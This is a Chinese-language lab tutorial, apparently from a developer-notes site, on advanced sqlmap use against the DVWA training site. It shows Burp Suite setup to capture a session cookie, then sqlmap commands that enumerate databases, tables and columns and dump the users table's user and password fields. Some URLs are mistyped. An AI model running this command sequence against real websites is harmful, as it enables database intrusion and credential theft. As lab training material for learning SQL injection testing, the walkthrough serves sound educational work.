热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

SQLSQLMAP进阶使用

1.访问DvWA网站(1)在攻击机Pentest-Atk打开FireFox浏览器,并访问靶机A-SQLi-Labs上的DVWA网站。访问的URL为:ht

1.访问DvWA网站
(1)在攻击机 Pentest-Atk打开FireFox浏览器,并访问靶机A-SQLi-Labs 上的DVWA网站。访问的URL为:
http ://[靶机 IP]/dvwal
(注意大小写)

 2.利用Burpsuite 工具抓包
(1)启动Burpsuite
在攻击机 Pentest-Atk 的桌面文件夹Burp中,鼠标左键双击BURP.cmd程序,
启动Burpsuite 。

 (2)设置Burpsuite的代理服务端口
在 Burpsuite 软件界面上选择选项卡"Proxy"->"Options",在Proxy Listeners模块下,将Burpsuite的代理服务端口设置为8080(此为Burpsuite 默认的服务端口))。

 (4)设置Firefox代理
回到FireFox浏览器界面,鼠标右键单击浏览器地址栏右方的FoxyProxy插件图
标按钮,在弹出的菜单中选择"为全部URLs启用代理服务器127.0.0.1:8080":

(5)利用Burpsuite工具拦截HTTP请求包
回到FireFox浏览器显示的 DVWA网站SQL注入训练模块界面,在"User ID"输入框中输入“1",然后点击Submit按钮:

4.寻找注入点
使用以下命令自动寻找网站的注入点,并获取网站及后台数据库的基本信息:
python sqlmap.py -u "http:// [靶机
IP]/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --COOKIE "[由Burpsuite拦截的HTTP请求包的COOKIE字段]"

 5.获取所有可用的数据库的库名
(1)使用以下命令获取所有可用的数据库的库名:
python sqlmap.py -u "http ://[靶机
IP]/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --COOKIE“[由 Burpsuite拦截的HTTP请求包的COOKIE字段]”--dbs

 (2)使用以下命令获取网站当前所在数据库的库名:
python sqlmap.py -u "http://[靶机
IP]/dvwa/vulnerabilities/ sqli/?id=1&Submit=Submit" --COOKIE "[由Burpsuite拦截的HTTP请求包的COOKIE字段]"--current-db

 6.获取dvwa数据库中所有的表名
使用以下命令获取 dvwa数据库中所有的表名:
python sqlmap.py -u "http://[靶机
IP] / dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --COOKIE "[由 Burpsuite拦截的HTTP请求包的COOKIE字段]”-Ddvwa --tables

 7.获取users表的全部字段名
使用以下命令获取users表的全部字段名:
python sqlmap.py -u "http:// [靶机
IP] /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --COOKIE "[由 Burpsuite拦截的HTTP请求包的COOKIE字段]”-Ddvwa -T users --columns

 8.获取users表中user和 password字段的全部值
使用以下命令获取users表中 user和l password字段的全部值:
python sqlmap.py -u "http:[/ [靶机
IP] / dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --COOKIE "[由Burpsuite拦截的 HTTP请求包的COOKIE字段]” -D dvwa -T users -c user,password --dump

 


推荐阅读
  • 使用Ubuntu中的Python获取浏览器历史记录原文: ... [详细]
  • 安装mysqlclient失败解决办法
    本文介绍了在MAC系统中,使用django使用mysql数据库报错的解决办法。通过源码安装mysqlclient或将mysql_config添加到系统环境变量中,可以解决安装mysqlclient失败的问题。同时,还介绍了查看mysql安装路径和使配置文件生效的方法。 ... [详细]
  • Spring源码解密之默认标签的解析方式分析
    本文分析了Spring源码解密中默认标签的解析方式。通过对命名空间的判断,区分默认命名空间和自定义命名空间,并采用不同的解析方式。其中,bean标签的解析最为复杂和重要。 ... [详细]
  • Nginx使用(server参数配置)
    本文介绍了Nginx的使用,重点讲解了server参数配置,包括端口号、主机名、根目录等内容。同时,还介绍了Nginx的反向代理功能。 ... [详细]
  • 搭建Windows Server 2012 R2 IIS8.5+PHP(FastCGI)+MySQL环境的详细步骤
    本文详细介绍了搭建Windows Server 2012 R2 IIS8.5+PHP(FastCGI)+MySQL环境的步骤,包括环境说明、相关软件下载的地址以及所需的插件下载地址。 ... [详细]
  • 向QTextEdit拖放文件的方法及实现步骤
    本文介绍了在使用QTextEdit时如何实现拖放文件的功能,包括相关的方法和实现步骤。通过重写dragEnterEvent和dropEvent函数,并结合QMimeData和QUrl等类,可以轻松实现向QTextEdit拖放文件的功能。详细的代码实现和说明可以参考本文提供的示例代码。 ... [详细]
  • 本文介绍了数据库的存储结构及其重要性,强调了关系数据库范例中将逻辑存储与物理存储分开的必要性。通过逻辑结构和物理结构的分离,可以实现对物理存储的重新组织和数据库的迁移,而应用程序不会察觉到任何更改。文章还展示了Oracle数据库的逻辑结构和物理结构,并介绍了表空间的概念和作用。 ... [详细]
  • 本文介绍了Java工具类库Hutool,该工具包封装了对文件、流、加密解密、转码、正则、线程、XML等JDK方法的封装,并提供了各种Util工具类。同时,还介绍了Hutool的组件,包括动态代理、布隆过滤、缓存、定时任务等功能。该工具包可以简化Java代码,提高开发效率。 ... [详细]
  • android listview OnItemClickListener失效原因
    最近在做listview时发现OnItemClickListener失效的问题,经过查找发现是因为button的原因。不仅listitem中存在button会影响OnItemClickListener事件的失效,还会导致单击后listview每个item的背景改变,使得item中的所有有关焦点的事件都失效。本文给出了一个范例来说明这种情况,并提供了解决方法。 ... [详细]
  • Centos7.6安装Gitlab教程及注意事项
    本文介绍了在Centos7.6系统下安装Gitlab的详细教程,并提供了一些注意事项。教程包括查看系统版本、安装必要的软件包、配置防火墙等步骤。同时,还强调了使用阿里云服务器时的特殊配置需求,以及建议至少4GB的可用RAM来运行GitLab。 ... [详细]
  • 本文介绍了C++中省略号类型和参数个数不确定函数参数的使用方法,并提供了一个范例。通过宏定义的方式,可以方便地处理不定参数的情况。文章中给出了具体的代码实现,并对代码进行了解释和说明。这对于需要处理不定参数的情况的程序员来说,是一个很有用的参考资料。 ... [详细]
  • Linux如何安装Mongodb的详细步骤和注意事项
    本文介绍了Linux如何安装Mongodb的详细步骤和注意事项,同时介绍了Mongodb的特点和优势。Mongodb是一个开源的数据库,适用于各种规模的企业和各类应用程序。它具有灵活的数据模式和高性能的数据读写操作,能够提高企业的敏捷性和可扩展性。文章还提供了Mongodb的下载安装包地址。 ... [详细]
  • 如何查询zone下的表的信息
    本文介绍了如何通过TcaplusDB知识库查询zone下的表的信息。包括请求地址、GET请求参数说明、返回参数说明等内容。通过curl方法发起请求,并提供了请求示例。 ... [详细]
  • 本文介绍了一种轻巧方便的工具——集算器,通过使用集算器可以将文本日志变成结构化数据,然后可以使用SQL式查询。集算器利用集算语言的优点,将日志内容结构化为数据表结构,SPL支持直接对结构化的文件进行SQL查询,不再需要安装配置第三方数据库软件。本文还详细介绍了具体的实施过程。 ... [详细]
  • 本文介绍了Sencha Touch的学习使用心得,主要包括搭建项目框架的过程。作者强调了使用MVC模式的重要性,并提供了一个干净的引用示例。文章还介绍了Index.html页面的作用,以及如何通过链接样式表来改变全局风格。 ... [详细]
author-avatar
antefigure850_495
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有